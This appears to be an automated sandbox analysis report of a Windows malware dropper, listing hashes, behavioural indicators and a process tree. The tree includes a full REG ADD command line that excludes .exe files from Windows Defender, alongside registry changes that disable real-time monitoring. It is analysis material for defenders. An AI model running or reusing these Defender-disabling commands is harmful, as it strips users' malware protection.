Analysis
-
max time kernel
127s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
02/02/2023, 18:26
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
5f31be9c294b2efa10d117a49103771b
-
SHA1
1bfb8c5bf2fb257c380d091af37c543ac0ed6c09
-
SHA256
855f71b486fa8038b40dcd9fcfbc73d4a2c0a623b028447f7847c8301bc40d5b
-
SHA512
64fc0b31f27d80054e868c7ca7cc77e08a02e9e950afeabb316662d7e2fe7a6b84b376a2e8dc27adf6622a5c081e72500ad973d2049b4817d5227359be436720
-
SSDEEP
196608:91OPGZ3lcxcozBjYUTU0xUl44Ko3N0hEOfYxv0lAp9rgYjRZaZ:3OPyiCoztaK3odTFxMlApZfaZ
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\blpPjnGTAzdU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xWQZBYHAiaeWC = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fUKjeSfjjlnEgcVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yexCCFOajIHORAIN = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yexCCFOajIHORAIN = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NwZfPRikU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\abxmdGYmZpUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yexCCFOajIHORAIN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NwZfPRikU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\abxmdGYmZpUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ljuzyWclZneVnEImCIR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yexCCFOajIHORAIN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fUKjeSfjjlnEgcVB = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\blpPjnGTAzdU2 = "0" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ljuzyWclZneVnEImCIR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xWQZBYHAiaeWC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rUhpVuUWJmMrHzQUt = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 20 1688 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Control Panel\International\Geo\Nation dnHVamm.exe -
Executes dropped EXE 4 IoCs
pid Process 940 Install.exe 556 Install.exe 788 iHEqKTz.exe 1940 dnHVamm.exe -
Loads dropped DLL 12 IoCs
pid Process 2028 file.exe 940 Install.exe 940 Install.exe 940 Install.exe 940 Install.exe 556 Install.exe 556 Install.exe 556 Install.exe 1688 rundll32.exe 1688 rundll32.exe 1688 rundll32.exe 1688 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json dnHVamm.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol dnHVamm.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini iHEqKTz.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 dnHVamm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol iHEqKTz.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 dnHVamm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 dnHVamm.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA dnHVamm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA dnHVamm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA dnHVamm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 dnHVamm.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol iHEqKTz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat dnHVamm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA dnHVamm.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\NwZfPRikU\CbPYgpw.xml dnHVamm.exe File created C:\Program Files (x86)\blpPjnGTAzdU2\ltipHVpwTAkzc.dll dnHVamm.exe File created C:\Program Files (x86)\ljuzyWclZneVnEImCIR\jUvKodP.dll dnHVamm.exe File created C:\Program Files (x86)\ljuzyWclZneVnEImCIR\SWTEHUI.xml dnHVamm.exe File created C:\Program Files (x86)\xWQZBYHAiaeWC\zUFWXMd.xml dnHVamm.exe File created C:\Program Files (x86)\NwZfPRikU\tpVwAz.dll dnHVamm.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak dnHVamm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja dnHVamm.exe File created C:\Program Files (x86)\abxmdGYmZpUn\XZKmZpm.dll dnHVamm.exe File created C:\Program Files (x86)\xWQZBYHAiaeWC\iHQWfjg.dll dnHVamm.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi dnHVamm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi dnHVamm.exe File created C:\Program Files (x86)\blpPjnGTAzdU2\YFzkXtR.xml dnHVamm.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\kyVYsaRdXUGdbNqrr.job schtasks.exe File created C:\Windows\Tasks\OmzuWttHXavsTQP.job schtasks.exe File created C:\Windows\Tasks\AdvNsdlCKgqWpwUCJ.job schtasks.exe File created C:\Windows\Tasks\bfCUCTabMcDSMjMyBb.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1360 schtasks.exe 916 schtasks.exe 1580 schtasks.exe 1772 schtasks.exe 1160 schtasks.exe 1476 schtasks.exe 836 schtasks.exe 604 schtasks.exe 1800 schtasks.exe 1304 schtasks.exe 1536 schtasks.exe 1620 schtasks.exe 836 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dnHVamm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-77-05-40-df-35\WpadDecision = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-77-05-40-df-35\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1B8CA7BE-1633-4594-8014-F7E3DDBB4033} dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs dnHVamm.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1B8CA7BE-1633-4594-8014-F7E3DDBB4033}\9e-77-05-40-df-35 dnHVamm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-77-05-40-df-35\WpadDecisionReason = "1" dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-77-05-40-df-35 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1B8CA7BE-1633-4594-8014-F7E3DDBB4033}\9e-77-05-40-df-35 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-77-05-40-df-35 dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs dnHVamm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" dnHVamm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1B8CA7BE-1633-4594-8014-F7E3DDBB4033}\WpadDecision = "0" dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates dnHVamm.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1B8CA7BE-1633-4594-8014-F7E3DDBB4033}\WpadDecisionTime = 303f4a7f3c37d901 dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dnHVamm.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1B8CA7BE-1633-4594-8014-F7E3DDBB4033}\WpadDecisionReason = "1" dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates dnHVamm.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1B8CA7BE-1633-4594-8014-F7E3DDBB4033}\WpadNetworkName = "Network 2" dnHVamm.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-77-05-40-df-35\WpadDecisionTime = 303f4a7f3c37d901 dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dnHVamm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates dnHVamm.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1744 powershell.EXE 1744 powershell.EXE 1744 powershell.EXE 296 powershell.EXE 296 powershell.EXE 296 powershell.EXE 792 powershell.EXE 792 powershell.EXE 792 powershell.EXE 1744 powershell.EXE 1744 powershell.EXE 1744 powershell.EXE 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe 1940 dnHVamm.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1744 powershell.EXE Token: SeDebugPrivilege 296 powershell.EXE Token: SeDebugPrivilege 792 powershell.EXE Token: SeDebugPrivilege 1744 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2028 wrote to memory of 940 2028 file.exe 28 PID 2028 wrote to memory of 940 2028 file.exe 28 PID 2028 wrote to memory of 940 2028 file.exe 28 PID 2028 wrote to memory of 940 2028 file.exe 28 PID 2028 wrote to memory of 940 2028 file.exe 28 PID 2028 wrote to memory of 940 2028 file.exe 28 PID 2028 wrote to memory of 940 2028 file.exe 28 PID 940 wrote to memory of 556 940 Install.exe 29 PID 940 wrote to memory of 556 940 Install.exe 29 PID 940 wrote to memory of 556 940 Install.exe 29 PID 940 wrote to memory of 556 940 Install.exe 29 PID 940 wrote to memory of 556 940 Install.exe 29 PID 940 wrote to memory of 556 940 Install.exe 29 PID 940 wrote to memory of 556 940 Install.exe 29 PID 556 wrote to memory of 1724 556 Install.exe 31 PID 556 wrote to memory of 1724 556 Install.exe 31 PID 556 wrote to memory of 1724 556 Install.exe 31 PID 556 wrote to memory of 1724 556 Install.exe 31 PID 556 wrote to memory of 1724 556 Install.exe 31 PID 556 wrote to memory of 1724 556 Install.exe 31 PID 556 wrote to memory of 1724 556 Install.exe 31 PID 556 wrote to memory of 364 556 Install.exe 33 PID 556 wrote to memory of 364 556 Install.exe 33 PID 556 wrote to memory of 364 556 Install.exe 33 PID 556 wrote to memory of 364 556 Install.exe 33 PID 556 wrote to memory of 364 556 Install.exe 33 PID 556 wrote to memory of 364 556 Install.exe 33 PID 556 wrote to memory of 364 556 Install.exe 33 PID 1724 wrote to memory of 924 1724 forfiles.exe 36 PID 1724 wrote to memory of 924 1724 forfiles.exe 36 PID 1724 wrote to memory of 924 1724 forfiles.exe 36 PID 1724 wrote to memory of 924 1724 forfiles.exe 36 PID 1724 wrote to memory of 924 1724 forfiles.exe 36 PID 1724 wrote to memory of 924 1724 forfiles.exe 36 PID 1724 wrote to memory of 924 1724 forfiles.exe 36 PID 364 wrote to memory of 916 364 forfiles.exe 35 PID 364 wrote to memory of 916 364 forfiles.exe 35 PID 364 wrote to memory of 916 364 forfiles.exe 35 PID 364 wrote to memory of 916 364 forfiles.exe 35 PID 364 wrote to memory of 916 364 forfiles.exe 35 PID 364 wrote to memory of 916 364 forfiles.exe 35 PID 364 wrote to memory of 916 364 forfiles.exe 35 PID 916 wrote to memory of 1084 916 cmd.exe 37 PID 916 wrote to memory of 1084 916 cmd.exe 37 PID 916 wrote to memory of 1084 916 cmd.exe 37 PID 916 wrote to memory of 1084 916 cmd.exe 37 PID 916 wrote to memory of 1084 916 cmd.exe 37 PID 916 wrote to memory of 1084 916 cmd.exe 37 PID 916 wrote to memory of 1084 916 cmd.exe 37 PID 924 wrote to memory of 1616 924 cmd.exe 38 PID 924 wrote to memory of 1616 924 cmd.exe 38 PID 924 wrote to memory of 1616 924 cmd.exe 38 PID 924 wrote to memory of 1616 924 cmd.exe 38 PID 924 wrote to memory of 1616 924 cmd.exe 38 PID 924 wrote to memory of 1616 924 cmd.exe 38 PID 924 wrote to memory of 1616 924 cmd.exe 38 PID 924 wrote to memory of 1800 924 cmd.exe 40 PID 924 wrote to memory of 1800 924 cmd.exe 40 PID 924 wrote to memory of 1800 924 cmd.exe 40 PID 924 wrote to memory of 1800 924 cmd.exe 40 PID 924 wrote to memory of 1800 924 cmd.exe 40 PID 924 wrote to memory of 1800 924 cmd.exe 40 PID 924 wrote to memory of 1800 924 cmd.exe 40 PID 916 wrote to memory of 792 916 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zS1871.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Users\Admin\AppData\Local\Temp\7zS24E0.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
